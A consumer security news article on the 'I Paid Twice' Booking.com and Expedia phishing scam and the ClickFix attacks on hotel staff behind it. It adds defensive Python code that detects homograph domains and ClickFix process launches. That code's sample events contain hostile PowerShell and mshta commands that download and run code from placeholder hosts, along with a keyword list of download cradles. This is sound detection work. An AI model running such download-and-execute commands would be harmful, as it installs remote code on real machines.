This New Hotel Reservation Scam Is Fooling People Who Use Sites Like Booking.com


If you’ve booked a hotel through a platform like Booking.com or Expedia, beware any communication that directs you to confirm your payment details to hold your reservation. Threat actors are targeting the hospitality industry with a phishing campaign designed to steal from travelers.

As outlined by security firm Sekoia.io and reported by The Hacker News, the scheme is called “I Paid Twice” because guests who have already paid for their stay are conned into entering their card details a second time on a fraudulent page. Scammers contact guests via WhatsApp or email about a real booking, claiming that the payment must be verified or the reservation will be cancelled. The link leads to a fake landing page styled after Booking.com or Expedia, where victims are prompted to enter their card information.

This isn’t the first scam to target Booking.com: scammers have previously spoofed the site to spread malware directly to users via both fake CAPTCHAs and homograph attacks, which swap look-alike characters (a Cyrillic “о” for a Latin “o,” for instance) into a domain name so that a malicious address passes for the genuine site.
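The homograph trick described above, as an added example (not code from the article or from Sekoia.io): a small Python checker that converts a punycode hostname back to Unicode, folds look-alike characters to their Latin counterparts, and compares the result with the real domain. The confusables table is a hand-picked subset I constructed for illustration (the full Unicode confusables list is far longer), and the sample hostnames are constructed, not observed attack domains.

```python
import unicodedata

# Minimal confusables table (constructed for this example): code points that
# render like a Latin letter but are not that letter.
CONFUSABLES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0443": "y",  # CYRILLIC SMALL LETTER U
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0458": "j",  # CYRILLIC SMALL LETTER JE
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
    "\u04bb": "h",  # CYRILLIC SMALL LETTER SHHA
    "\u0131": "i",  # LATIN SMALL LETTER DOTLESS I
    "\u0261": "g",  # LATIN SMALL LETTER SCRIPT G
}


def to_unicode_host(host: str) -> str:
    """Return the Unicode form of a hostname; 'xn--' labels are punycode-decoded.

    Browsers show one form or the other depending on policy, so always compare
    the Unicode form rather than whatever happened to appear in the address bar.
    """
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # already contains non-ASCII characters


def skeleton(host: str) -> str:
    """Fold a hostname so that look-alikes collide with the domain they imitate."""
    folded = unicodedata.normalize("NFKC", host).lower()
    return "".join(CONFUSABLES.get(ch, ch) for ch in folded)


def non_ascii_chars(host: str):
    """List every non-ASCII character with its Unicode name, for a human to see."""
    return [(ch, unicodedata.name(ch, "UNKNOWN")) for ch in host if ord(ch) > 127]


def classify(host: str, legit: str = "booking.com") -> str:
    """'genuine' for the real domain, 'homograph' if it only matches after
    confusable folding, 'other' for anything else (e.g. booking-secure.example)."""
    uhost = to_unicode_host(host).rstrip(".").lower()
    if uhost == legit:
        return "genuine"
    if skeleton(uhost) == legit:
        return "homograph"
    return "other"


if __name__ == "__main__":
    # Constructed sample: Latin 'oo' replaced by Cyrillic 'оо'.
    fake = "b\u043e\u043eking.com"
    ascii_form = fake.encode("idna").decode("ascii")  # what the wire sees
    for host in ("booking.com", fake, ascii_form, "booking-payment-verify.com"):
        print(f"{host!r:40} -> {classify(host)} {non_ascii_chars(to_unicode_host(host))}")
```

A skeleton match is a strong signal but not the only one to watch for: a plain ASCII look-alike such as `booking-payment-verify.com` comes back as `other` here, and that is exactly the kind of domain the fake payment pages in this campaign tend to use, so "not a homograph" must never be read as "legitimate".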

This multi-step campaign actually begins when hackers target hotels themselves with ClickFix attacks, a type of social engineering attack designed to trick users into downloading malware via fake error messages or CAPTCHA forms. (I’ve covered a handful of ClickFix schemes, such as those spread via AI-generated instructional videos on TikTok and expired invite links on Discord.)

The scam runs as follows: hotel managers receive emails from compromised accounts containing phishing links that redirect to a supposed reCAPTCHA page. This is the ClickFix component: targets are instructed to complete the challenge to “ensure the security of your connection.” After a couple of redirects, the page tells the user to copy a PowerShell command and run it themselves, and that command downloads a Remote Access Trojan (such as PureRAT) onto the device.
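To make the ClickFix step concrete from the defender’s side, here is an added Python example (not code from the article or from Sekoia.io) that scans process-creation records for the trace ClickFix leaves behind: a script host launched by the user’s interactive shell (explorer.exe is the parent of anything started from the Win+R Run dialog) with a download-and-execute command line, including one hidden behind `-EncodedCommand`. The record format, field names, sample events and the `lure.invalid` URLs are all constructed for this example; real Sysmon or EDR telemetry carries the same three fields under different names.

```python
import base64
import re
from ntpath import basename  # Windows path handling, works on any OS

# Processes that a ClickFix lure typically has the victim start from the Run box.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}
# Win+R / File Explorer address bar both spawn children under explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}

INDICATORS = {
    "hidden_window":     re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-w\s+h\b"),
    "download_cradle":   re.compile(r"(?i)\b(?:iwr|invoke-webrequest|invoke-restmethod|"
                                    r"irm|downloadstring|downloadfile|curl|wget)\b"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "remote_url":        re.compile(r"(?i)\bhttps?://"),
    "encoded_command":   re.compile(r"(?i)-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}"),
}


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Score one process-creation record. Flags only the ClickFix shape:
    interactive parent AND script host AND at least one payload indicator."""
    parent = basename(event["parent"]).lower()
    image = basename(event["image"]).lower()
    decoded = decode_encoded_command(event["cmdline"])
    # Scan the decoded script too: the pasted command is often base64-wrapped
    # precisely so that keyword matching on the raw command line sees nothing.
    text = event["cmdline"] if decoded is None else event["cmdline"] + " " + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    suspicious = parent in INTERACTIVE_PARENTS and image in SCRIPT_HOSTS and bool(hits)
    return {"suspicious": suspicious, "indicators": hits, "decoded": decoded}


def find_clickfix(events):
    """IDs of the events that match the ClickFix pattern."""
    return [e["id"] for e in events if analyze(e)["suspicious"]]


# Constructed sample payload and events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://lure.invalid/p')".encode("utf-16le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -NoProfile -c "iwr http://lure.invalid/x -UseBasicParsing | iex"'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -NoProfile -enc " + ENCODED_PAYLOAD},
    {"id": 3, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://lure.invalid/v.hta"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe", "image": PS,  # scheduled script
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
    {"id": 5, "parent": r"C:\Windows\explorer.exe", "image": PS,  # user just opened a shell
     "cmdline": "powershell"},
    {"id": 6, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad C:\Users\mgr\notes.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], analyze(ev))
    print("ClickFix candidates:", find_clickfix(SAMPLE_EVENTS))
```

The parent-process condition is what keeps this rule quiet on a fleet: PowerShell with a download cradle is routine under a scheduler or a management agent, but a human pasting it into the Run dialog is not, and that is the behaviour the fake CAPTCHA page depends on. Pair it with the `HKCU\...\Explorer\RunMRU` history, which records what was typed into Win+R, when triaging a hit.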

Once the malware has been delivered, it gives threat actors remote access to the machine, including control of the mouse and keyboard, data exfiltration, command execution, file uploads and downloads, keylogging, and webcam and microphone capture. From there, hackers steal the hotel’s admin credentials for booking platforms and use them to send the aforementioned phishing messages to guests, complete with the guests’ real reservation details, or they sell that access to other cybercriminals.

Don’t fall for the hotel booking scam

You can’t control whether a hotel manager unwittingly hands over access to your booking information. But you can avoid compromising your own personal and financial data by treating any unexpected message about your reservation with suspicion. Neither a reputable hotel nor the booking platform itself will normally demand that you re-enter payment details to hold a reservation you’ve already confirmed and paid for. Bear in mind that because the scammers are working from the hotel’s own compromised account, the message may arrive through a channel you’d normally trust and cite your real booking, so the apparent sender proves nothing.

The sense of urgency is meant to make you act before you think, so if you’re not sure what’s going on, call the hotel directly using the number on its official website (not one taken from the email or WhatsApp message). Don’t click any links, and don’t enter any information unless you have checked the address bar and confirmed that you are on the legitimate booking platform or hotel website rather than a look-alike domain. If you have already entered card details on such a page, contact your card issuer right away to block the card and dispute any charges.
